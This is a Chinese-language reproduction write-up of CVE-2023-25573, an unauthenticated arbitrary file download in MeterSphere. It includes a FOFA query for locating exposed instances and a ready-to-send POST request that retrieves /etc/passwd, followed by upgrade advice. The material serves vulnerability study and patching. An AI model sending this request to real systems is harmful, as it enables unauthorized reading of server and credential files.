CVE-2023-25573:MeterSphere 任意文件下载漏洞复现[附POC]

文章目录

  • MeterSphere 任意文件下载(CVE-2023-25573)漏洞复现[附POC]
    • 0x01 前言
    • 0x02 漏洞描述
    • 0x03 影响版本
    • 0x04 漏洞环境
    • 0x05 漏洞复现
      • 1.访问漏洞环境
      • 2.构造POC
      • 3.复现
    • 0x06 修复建议

MeterSphere 任意文件下载(CVE-2023-25573)漏洞复现[附POC]

0x01 前言

免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用!!!

0x02 漏洞描述

metersphere 是一个开源的持续测试平台。在受影响的版本中,“/api/jmeter/download/files”中存在不正确地访问控制漏洞,该漏洞允许任何用户无需身份验证即可下载任何文件。此问题可能会暴露运行进程可用的所有文件。

CVE-2023-25573:MeterSphere 任意文件下载漏洞复现[附POC]_第1张图片

0x03 影响版本

MeterSphere <= 1.20.19 lts
MeterSphere <= 2.6.2

0x04 漏洞环境

FOFA语法: app=“FIT2CLOUD-MeterSphere”
CVE-2023-25573:MeterSphere 任意文件下载漏洞复现[附POC]_第2张图片

0x05 漏洞复现

1.访问漏洞环境

CVE-2023-25573:MeterSphere 任意文件下载漏洞复现[附POC]_第3张图片

2.构造POC

POC (POST)

POST /api/jmeter/download/files HTTP/1.1
Content-Type: application/json
Host: ip:port
Content-Length: 66

{"reportId":"369","bodyFiles":[{"id":"aaa","name":"/etc/passwd"}]}

3.复现

1.不需要登录直接发送数据包
CVE-2023-25573:MeterSphere 任意文件下载漏洞复现[附POC]_第4张图片2.数据包响应成功,文件名为:369.zip,可直接下载,解压后可查看 /etc/passwd 的内容。

CVE-2023-25573:MeterSphere 任意文件下载漏洞复现[附POC]_第5张图片

0x06 修复建议

更新 MeterSphere 至安全版本:

https://github.com/metersphere/metersphere/releases

PS:参考链接

https://nvd.nist.gov/vuln/detail/CVE-2023-25573
https://github.com/metersphere/metersphere/security/advisories/GHSA-mcwr-j9vm-5g8h

你可能感兴趣的:(漏洞复现,metersphere,系统安全,安全,web安全,网络安全)